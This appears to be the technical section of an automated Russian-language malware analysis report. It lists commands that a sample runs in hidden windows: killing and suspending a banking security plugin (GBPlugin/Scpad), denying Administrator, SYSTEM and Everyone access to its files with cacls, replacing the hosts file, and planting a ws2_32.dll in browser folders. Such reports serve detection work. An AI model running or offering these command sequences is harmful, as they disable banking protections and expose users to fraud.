Техническая информация
- '%WINDIR%\syswow64\taskkill.exe' -f /im GbpSv.exe
- <DRIVERS>\etc\hosts
- ClassName: 'MS_WINHELP' WindowName: ''
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c del "<DRIVERS>\etc\hosts" /s /q (со скрытым окном)
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /P ADMINISTRATOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /D TODOS
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /P SYSTEM:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /D ADMINISTRADO
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /P ADMINISTRADOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /P TODOS:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /D SYSTEM
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /P ADMINISTRATOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /P SYSTEM:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /D ADMINISTRADO
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /P SYSTEM:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /D TODOS
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /D ADMINISTRATOR
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /P ADMINISTRATOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.dll" /T /E /C /P TODOS:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /D SYSTEM
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /P TODOS:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /P ADMINISTRADOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /D ADMINISTRATOR
- '%WINDIR%\syswow64\cmd.exe' /c copy "%PROGRAMFILES%\Mozilla Firefox\*.*" "%PROGRAMFILES%\Mozilla Firefox 4.0 Beta 6\*.*" /s /q (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c copy "%PROGRAMFILES%\Mozilla Firefox\ws2_32.dll" "%PROGRAMFILES%\Internet Explorer\ws2_32.dll" (со скрытым окном)
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.exe" /T /E /C /D TODOS
- '%WINDIR%\syswow64\cmd.exe' /c taskkill -f /im GbpSv.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c pssuspend -r winlogon.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c pssuspend -r explorer.exe (со скрытым окном)
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /D SYSTEM
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /D ADMINISTRATOR
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /P ADMINISTRATOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /D SYSTEM
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /P SYSTEM:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /D ADMINISTRATOR
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /D TODOS
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /P TODOS:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /D ADMINISTRADO
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /P ADMINISTRADOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /D ADMINISTRATOR
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /P ADMINISTRATOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /P SYSTEM:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /P TODOS:N
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /P TODOS:N (со скрытым окном)
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /D TODOS
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /P ADMINISTRADOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /D ADMINISTRADO
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /D ADMINISTRATOR
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /P ADMINISTRATOR:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /D SYSTEM
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /P TODOS:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /P SYSTEM:N
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gmd" /T /E /C /D TODOS
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /D ADMINISTRADO
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/GBPlugin/*.gpc" /T /E /C /P ADMINISTRADOR:N
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /D ADMINISTRADO (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /P ADMINISTRADOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /D ADMINISTRATOR (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /D ADMINISTRADO (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /P ADMINISTRADOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /D ADMINISTRATOR (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /P ADMINISTRATOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /D SYSTEM (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /P SYSTEM:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /D TODOS (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.dll" /T /E /C /P TODOS:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /D ADMINISTRADO (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /P ADMINISTRADOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /D ADMINISTRATOR (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /P ADMINISTRATOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /D SYSTEM (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /P SYSTEM:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /D TODOS (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.exe" /T /E /C /P TODOS:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c pssuspend gbpsv.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c pssuspend explorer.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c pssuspend winlogon.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c pssuspend /accepteula (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c copy "%PROGRAMFILES%\Mozilla Firefox\cacls.exe" "<SYSTEM32>\cacls.exe (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c copy "%PROGRAMFILES%\Mozilla Firefox\hosts" "<DRIVERS>\etc\hosts (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /D TODOS (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /P SYSTEM:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /P TODOS:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /D SYSTEM (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /P ADMINISTRATOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /P ADMINISTRATOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /D SYSTEM (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /P SYSTEM:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /D TODOS (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.bin" /T /E /C /P TODOS:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /D ADMINISTRADO (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /P ADMINISTRADOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /D ADMINISTRATOR (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /P ADMINISTRATOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /D SYSTEM (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /P SYSTEM:N (со скрытым окном)
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.dll" /T /E /C /D SYSTEM
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /P ADMINISTRADOR:N
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /D ADMINISTRADO (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /P ADMINISTRADOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /D ADMINISTRATOR (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /P ADMINISTRATOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /D SYSTEM (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /P SYSTEM:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /D TODOS (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gmd" /T /E /C /P TODOS:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /D ADMINISTRADO (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /P ADMINISTRADOR:N (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/GBPlugin/*.gpc" /T /E /C /D ADMINISTRATOR (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c cacls "%ProgramFiles%/Scpad/*.dll" /T /E /C /D TODOS (со скрытым окном)
- '%WINDIR%\syswow64\cacls.exe' "C:\Program Files (x86)/Scpad/*.bin" /T /E /C /D ADMINISTRADO